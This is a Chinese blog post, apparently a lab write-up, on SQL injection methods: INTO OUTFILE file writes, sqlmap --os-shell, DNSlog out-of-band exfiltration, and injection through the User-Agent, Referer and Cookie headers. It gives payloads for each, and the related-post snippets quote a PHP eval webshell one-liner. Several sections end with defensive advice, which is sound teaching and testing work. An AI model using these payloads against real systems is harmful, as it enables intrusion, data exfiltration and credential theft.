SQL注入其他方法

最新推荐文章于 2024-04-15 18:32:18 发布
最新推荐文章于 2024-04-15 18:32:18 发布
阅读量650 收藏 24
点赞数 18
分类专栏: web安全 文章标签: sql 数据库 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_70349048/article/details/135952872
版权

此次实验因为环境问题很多无法复现,在此只讨论过程和方法

一、SQL注入之outfile注入

mysql的outfile的作用是导出文件,使用此方法的必要条件:(此方法成功率极低)

1、知道目标网站的物理路径;

2、%secure_file_priv这个参数必输是空,注意不是NULL,默认的NULL是正常的;

当 secure_file_priv 为空,就可以读取磁盘的目录

当 secure_file_priv 为 G:\,就可以读取G盘的文件

当 secure_file_priv 为 null,load_file 就不能加载文件

3、要设置Value参数为空,必须是网站的root权限,但是有了root权限就没必要进行传马了。

先查看环境中的参数是否正确:

show variables like "%secure_file_priv";

可以用此漏洞上传一句话木马,web.php就是木马上传的文件

?id=1')) union select 1,2,'<?php echo "Hello, World!"; ?>' into outfile 'D:\phpstudy_pro\WWW\sqli\web.php'--+

二、利用sqlmap的--os-cmd或--os-shell

条件:

1、知道目标网站的物理路径;

2、在此网站有文件上传的权限。

直接执行命令:

sqlmap -u "http://192.168.0.105/sqli/Less-8/?id=1" --os-shell

三、DNSlog外带注入

使用条件苛刻!

1、需要有目标网站root权限;

3、数据库有读写权限即:secure_file_priv=“” ;

4、得有请求url权限 ;

5、目标网站还必须得是windows服务器。

好处就是如果遇到盲注,会很节省时间。

?id=1' and load_file(concat('\\\\', hex(user()),'.fn7vri.dnslog.cn/abc'))--+

hex():用来将获取的user变成十六进制,要不然只使用user可能会失败。

fn7vri.dnslog.cn:是从DNSlog网站上的网址

四、User-Agent注入

User-Agent是一个HTTP请求头部字段,用于标识发出请求的客户端应用程序或设备。

User-Agent:1'or updatexml(1,concat('~',(select database())),3),2,3)#

对ua进行注入就可以得到数据库里的数据

如何防止这个漏洞?

  1. 手动测试:手动构造特定的恶意User-Agent字符串,并将其插入到HTTP请求的User-Agent头部。然后观察目标服务器的响应是否表现出异常行为,如返回错误信息、崩溃或产生其他异常。这种方法需要具备一定的安全测试经验和知识。

  2. 自动化工具:使用专门的漏洞扫描工具,如OWASP Zap、Burp Suite等,进行自动化测试。这些工具通常包含检测User-Agent注入漏洞的模块,能够自动发送恶意的User-Agent字符串并分析目标服务器的响应。

  3. 安全审计:进行代码审计和安全审计,检查应用程序中对于User-Agent头部的处理方式是否存在漏洞。审查相关的代码逻辑和输入验证过程,寻找任何不安全的实现或缺陷。

五、Referer注入

Referer是一个HTTP请求头部字段,用于指示请求的来源页面的URL。

Referer: ' or extractvalue(1,concat('~',(select database()))),2)#

如何防止这个漏洞?

  1. 输入验证和过滤:对接收到的Referer头部进行严格的输入验证和过滤。可以使用白名单机制来限制只接受来自可信源的Referer值,并拒绝所有其他来源的请求。

  2. URL编码:在处理Referer时,进行URL编码以确保其中的特殊字符不会被解析为恶意代码或其他攻击载荷。

  3. 参数化查询:如果需要将Referer用于数据库查询或其他敏感操作,务必使用参数化查询或预编译语句,而不是将Referer直接拼接到查询语句中。这可以有效防止SQL注入攻击。

  4. 安全框架和库:使用可靠的Web应用程序防火墙(WAF)或安全框架,如ASP.NET的RequestValidation、Java的OWASP ESAPI等,这些框架和库可以自动检测和阻止一些常见的攻击,包括Referer注入。

  5. HTTPS使用:使用HTTPS协议加密通信可以确保Referer头部在传输过程中不被窃听或篡改,提高数据的安全性。

  6. 安全审计和测试:定期进行安全审计和渗透测试,检查应用程序是否存在Referer注入漏洞以及其他安全问题。可以使用专业的安全工具进行自动化扫描,也可以进行手动测试。

六、Cookie注入

Cookie: uname=' union select 1,2,(select group_concat(username,password) from users)#

如何防止这个漏洞?

  1. 输入验证和过滤:在设置Cookie时,对用户提供的值进行严格的输入验证和过滤,确保其中不包含恶意内容。

  2. 安全的Cookie设置:使用安全标志(Secure)和仅限HTTP标志(HttpOnly)来设置Cookie。Secure标志要求Cookie只能通过HTTPS协议传输,避免在不安全的网络中被窃听。HttpOnly标志可以防止JavaScript等客户端脚本访问Cookie,减少受到XSS攻击的风险。

  3. 加密和签名:对于包含敏感信息的Cookie,可以考虑使用加密和签名来保护其完整性和机密性,防止被篡改或窃取。

  4. 安全会话管理:实施安全的会话管理机制,包括随机生成会话令牌、合理设置会话超时时间、及时注销会话等。

  5. 安全审计和测试:定期进行安全审计和渗透测试,检查应用程序是否存在Cookie注入漏洞以及其他安全问题。可以使用专业的安全工具进行自动化扫描,也可以进行手动测试。

就不做程序猿
关注
  • 18
    点赞
  • 24
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql注入之into outfile语句写入一句话木马
m0_63436163的博客
01-26 1655
into outfile 语句用于把表数据导出到一个文本文件中,要想mysql用户对文件进行导入导出,首先要看指定的权限目录。当secure_file_priv的值为/tmp/ ,表示限制mysqld 的导入|导出只能发生在/tmp/目录下;5)select
sql注入下的outfile
Warrior_L6的博客
06-07 758
一、关于写入本地文件类型注入的思考 secure_file_priv="/" secure_file_priv的开关问题 默认情况下: 我们查一下这个secure_file_priv得到下面的结果 可以看到,本地value的值为NULL。NULL代表什么意思呢?经查资料: (1)NULL,表示禁止。 (2)如果value值有文件夹目录,则表示只允许该目录下文件(PS:测试子目录也不行)。 (3)如果为空,则表示不限制目录。 因为在my.ini的配置文件下没有secure_f..
sql注入之into outfile语句写入一句话木马_sql的into outfile
code8889的博客
04-15 1022
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。
Web渗透测试之SQL注入:Level7--outfile导出数据并获得webshell
vodkaDL的博客
11-13 424
文章目录前言导出数据上传webshell总结 前言 导出数据 上传webshell 总结
sql注入之into outfile
ljj20020718的博客
11-25 2420
sql注入之into outfile
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
mybatis防止SQL注入方法实例详解
08-27
MyBatis 防止 SQL 注入的方法实例详解 SQL 注入是一种简单的攻击手段,但直到今天仍然十分常见。MyBatis 作为一个流行的持久层框架,如何防止 SQL 注入呢?下面我们将详细介绍 MyBatis 防止 SQL 注入的方法实例详解...
php防止sql注入方法详解
12-18
SQL注入是一种常见的网络安全威胁,它利用了Web应用程序未能充分验证用户输入数据的漏洞。当攻击者在表单字段中插入恶意的SQL语句片段时,这些非法...通过这些方法,开发者可以大大降低PHP应用遭受SQL注入攻击的风险。
防御SQL注入方法总结
12-15
使用PreparedStatement是防止SQL注入最有效的方法。预编译的SQL语句在执行前会由数据库解析并创建执行计划。当设置参数时,如`PreparedStatement ps = conn.prepareStatement(sql); ps.setInt(1, id);`,数据库会将...
C#防SQL注入代码的三种方法
12-31
对于网站的安全性,是每个网站开发者和运营者最关心的问题。网站一旦出现漏洞,那势必将造成很大的损失。为了提高网站的安全性,首先网站要防注入,最重要的是服务器的安全... C#防SQL注入方法一  在Web.config文件中
sql注入之into outfile语句写入一句话木马_sql的into outfile(1)
2301_77033340的博客
04-12 513
1、漏洞介绍into outfile 语句用于把表数据导出到一个文本文件中,要想mysql用户对文件进行导入导出,首先要看指定的权限目录。mysql 新版本下secure_file_priv参数是用来限制LOAD DATA, SELECT … OUTFILE, and LOAD_FILE()传到哪个指定目录的。当secure_file_priv的值为null ,表示限制mysqld 不允许导入|导出;
SQL注入——文件上传
heyingcheng的博客
03-11 2319
3,into outfile命令使用的环境:必须知道一个,服务器上可以写入文件的文件夹的完整路径。2,数据库file权限规定了数据库用户是否有权限,向操作系统内写入和读取已存在的权限。在这里也可以用whoami看到小皮的权限,我给的是普通用户的权限,不是管理员权限。其实我们最终的目的是往目标靶场上上传一句话木马,或者是自己想上传的php文件。当然在试的过程中可能会出现一些碰巧的情况,比如用”试得到的是一样的结果。两种结果不一样,“错的就是错的“,所以我们找到了正确的闭合方式。
SQL注入——into outfile的使用
weixin_54217950的博客
02-16 4649
数据库中into outfile语句把表数据导出到一个文本文件中,那么利用这个语句,再配合满足的‘三个条件’,即可实现文件或者一句话木马导入到数据库文件的目录中。 三个条件: 1.具有root权限。 2.在数据库配置文件中的 配置项含有:secure_file_priv=''。(注意在数据库中此项默认为secure_file_priv=null)。 3.知道数据库的绝对路径。 注意:由于满足条件十分苛刻,所以很难实现。 例子 导入文件命令:http://127.0.0.1/sqli-labs-maste
SQL注入漏洞(2)注入方法2之into outfile注入
weixin_51339377的博客
03-18 851
into outfile/load_file name=-1' union select 1,load_file('C:/a.txt') --+ 读取c盘下的a.txt文件 name=-1' union select 1,load_file('C:/a.txt')into outfile 'C:/phpstudy_pro/WWW/pikachu/vul/sqli/haha.txt' --+ 读取c盘的a.txt内容到自己目录下的haha.txt 这个into outfile不具备创建文件的能力...
sql注入系列课程
10-14
本课程是sql注入系列课程,从最基础的sql注入语法讲起,里面包含常见数据库sql注入方法,及各种类型的sql注入,通过sql注入直接获取服务器权限等攻击方法及演示。
mysql注入 outfile_sql注入之文件写入into outfile
weixin_30698775的博客
02-02 2100
sql注入中写入webshell的几种方式sql注入中写入webshell的几种方式secure_file_priv="c:/…"被注释掉或者是web路径php.ini中的get_magic_quotes_gpc()函数未开启其中secure_file_priv有三种情况空,表示导入导出没有任何限制有指定路径,比如("c:/xxx/xxx"):只能向指定路径导入导出文件null,禁止导入导出在进行...
sql语句利用into outfile写入一句话
Blue_Starry的博客
03-04 6733
利用需要的条件有: 1、对web目录需要有写权限能够使用单引号 2、知道绝对路径 3、没有配置-secure-file-priv 当知道路径时,可以直接用?id=1 union select "&lt;?php @eval($_POST['123']);?&gt;" into outfile("C:/phpStudy/WWW/a.php") 或者采用PHPmyadmin,选择一个数据库如...
SQL注入一句话木马(load_file/out file
初学者L_言的博客
11-26 8639
工具 靶机——metasploitable2 环境——DVWA,(low等级下) 菜刀——蚁剑 权限查看 查看mysql是否有对函数load_file(),outfile()函数的限制 (securefilepriv的值是否为NULL) show global variables like '%secure%'; NULL 表示不可用, 空 表示可用 ' order by 2-- 查看字段...
常见的sql注入防御方法
最新发布
06-13
以下是一些常见的SQL注入防御方法: 1. **参数化查询(Parameterized Queries)**:这是最有效的防御手段之一,它将SQL语句中的用户输入作为参数传递给查询,而不是直接拼接到SQL文本中。这样可以避免解析器执行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值